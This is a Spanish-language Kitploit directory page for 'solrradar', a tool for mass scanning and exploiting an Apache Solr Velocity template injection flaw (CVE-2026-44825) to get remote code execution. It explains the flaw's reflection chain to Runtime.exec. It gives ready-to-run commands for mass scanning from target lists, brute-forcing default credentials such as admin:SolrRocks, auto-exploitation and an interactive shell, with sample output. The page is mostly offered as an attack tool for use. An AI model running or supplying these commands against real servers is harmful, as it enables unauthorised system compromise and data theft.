Skip to content
KitploitKITPLOIT
HerramientasBlog
Log in
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
solrradar — ☄️ Marco de reconocimiento y explotación masiva para Apache Solr CVE-2026-44825 — Inyección de plantillas Velocity a RCE | Kitploit
Herramientas/GitHubGitHub/shinthink/solrradar
ReconocimientoEscáneres de VulnerabilidadesAtaques de ContraseñasExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de PenetraciónComando y ControlRed TeamingDesarrollo de Payloads
GitHub
5154hace 2 mesesAún no revisado
shinthink/solrradar

solrradar

☄️ Marco de reconocimiento y explotación masiva para Apache Solr CVE-2026-44825 — Inyección de plantillas Velocity a RCE

Ver Repositorio

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

SolrRadar — Escáner de Apache Solr CVE-2026-44825

Python CVE License

Threads Version Brute RCE Shell

Marco de Reconocimiento Masivo y Explotación para Apache Solr

Inyección de Plantillas Velocity → Ejecución Remota de Código



📑 Tabla de Contenidos

  • Resumen de la Vulnerabilidad
  • Versiones Afectadas
  • Características
  • Instalación
  • Uso
  • Prueba de Concepto
  • Análisis Técnico en Profundidad
  • Metodología de Detección
  • Defensa y Mitigación
  • Descargo de Responsabilidad
  • Referencias

🔴 Resumen de la Vulnerabilidad

CVE-2026-44825 es una vulnerabilidad de severidad crítica en Apache Solr que permite a los atacantes lograr Ejecución Remota de Código (RCE) no autenticada mediante inyección de plantillas Velocity.

El Problema

El endpoint /select de Apache Solr acepta un parámetro wt=velocity que renderiza plantillas Velocity proporcionadas por el usuario. Cuando el Velocity Response Writer está habilitado (o puede habilitarse mediante la API de configuración), un atacante puede inyectar una plantilla maliciosa que invoque java.lang.Runtime.exec(), ejecutando comandos arbitrarios del sistema con los privilegios del proceso de Solr.

Impacto

VectorSeveridadImpacto
RCE no autenticada9.8 (Crítica)Compromiso total del sistema
RCE autenticada8.8 (Alta)Ejecución de código tras la autenticación
Divulgación de información5.3 (Media)Enumeración de cores/colecciones

El Motor de Plantillas Velocity

Apache Solr incluye Apache Velocity como un motor de plantillas opcional para el renderizado de respuestas. La vulnerabilidad reside en el VelocityResponseWriter de Solr, que procesa parámetros de plantilla controlados por el usuario sin una sanitización adecuada, permitiendo la invocación directa de las APIs de reflexión de Java:

Java Reflection Chain:
vtl → Class.forName("java.lang.Runtime") → getRuntime().exec(cmd)

🟠 Versiones Afectadas

Versión de Apache SolrEstadoNotas
9.4.0 – 9.10.1🔴 VulnerableExplotación activa en la naturaleza
10.0.0🔴 VulnerableLa versión inicial 10.x está afectada
10.0.1+🟢 ParcheadaCorrección retroportada
9.10.2+🟢 ParcheadaVersión de parche disponible
≤ 9.3.x🟢 No afectadaVelocity Response Writer no presente
8.x (todas)🟢 No afectadaSin soporte de Velocity

Nota: Las comprobaciones de versión se realizan automáticamente analizando la respuesta JSON de /admin/info/system.


✨ Características

🔍 Reconocimiento

  • Escaneo multi-objetivo — 30 hilos concurrentes, configurable
  • Huella de versión — Extracción exacta de la versión de Solr y Lucene
  • Detección de doble modo — SolrCloud + Standalone (nodo único)
  • Sondeo consciente de la autenticación — Prueba 3 endpoints de administración para Basic Auth
  • Enumeración de colecciones — Lista colecciones/cores sin autenticación cuando es posible

💀 Explotación

  • Fuerza bruta de credenciales — Diccionario integrado de credenciales predeterminadas de Solr
  • RCE por Velocity — Inyección de plantillas mediante java.lang.Runtime.exec()
  • Shell interactiva — Pseudo-terminal para comandos de post-explotación
  • Cadena de explotación automática — Detectar → fuerza bruta → RCE en un solo comando
  • Exportación JSON — Salida estructurada para integración con otras herramientas

📦 Instalación

# Clone the repository
git clone https://github.com/shinthink/solrradar.git
cd solrradar

# Install dependencies
pip install -r requirements.txt

# Verify
python solr_scanner.py --help

Requisitos

requests>=2.28.0
urllib3>=1.26.0

Solo bibliotecas estándar + requests. Sin dependencias exóticas.


📖 Uso

Argumentos de la Línea de Comandos

CVE-2026-44825 Apache Solr Scanner

  -t, --target     Single target URL or IP[:port]
  -f, --file       File containing targets (one per line, # for comments)
  --exploit        Auto-exploit if vulnerable credentials are found
  --rce            Launch interactive shell after authentication
  -u, --user       Username for Basic Auth
  -pw, --password  Password for Basic Auth
  -o, --output     JSON output file path          (default: solr_results.json)
  -w, --workers    Number of concurrent threads   (default: 30)
  -T, --timeout    HTTP request timeout (seconds) (default: 8)

Escaneo Básico

# Single target
python solr_scanner.py -t 192.168.1.100:8983

# Single target with custom path
python solr_scanner.py -t http://example.com/solr

# Mass scan from file
python solr_scanner.py -f targets.txt -o results.json

Formato de Archivo de Objetivos

# targets.txt — supports comments and blank lines
192.168.10.10:8983
192.168.10.20:8983
http://solr-target.internal/solr
192.168.1.0/24          # (CIDR not supported; pre-expand with external tool)

Explotación

# Scan + auto-exploit if creds found
python solr_scanner.py -f targets.txt --exploit

# Known credentials + interactive shell
python solr_scanner.py -t target:8983 --rce -u admin -pw SolrRocks

# Auto brute-force + shell on success
python solr_scanner.py -t target:8983 --rce

🧪 Prueba de Concepto

Escenario 1: Detección y Huella de Versión

$ python solr_scanner.py -f targets.txt
CVE-2026-44825 Apache Solr Scanner

Targets: 3 | Threads: 30 | Timeout: 8s
Scanning...

[Solr 8.11.2] http://192.168.10.10:8983/solr
[Solr 8.11.2] http://192.168.10.20:8983/solr
    Cols (no auth): ['authority', 'dfa', 'oai', 'search']
[Solr 9.4.1] VULN +Auth http://solr-target.internal/solr

Done. Total:3 | Solr:3 | Vuln:1

Los 3 objetivos fueron detectados. La instancia 9.4.1 está marcada como vulnerable con Basic Auth habilitado.


Escenario 2: Fuerza Bruta de Credenciales

$ python solr_scanner.py -t solr-target.internal
CVE-2026-44825 Apache Solr Scanner

[Solr 9.4.1] VULN +Auth http://solr-target.internal/solr
    [!] admin:SolrRocks
    Cols: ['cms', 'users', 'search', 'analytics']

La credencial predeterminada admin:SolrRocks otorga acceso a las APIs de administración de Solr. Se descubrieron cuatro colecciones.


Descargar herramienta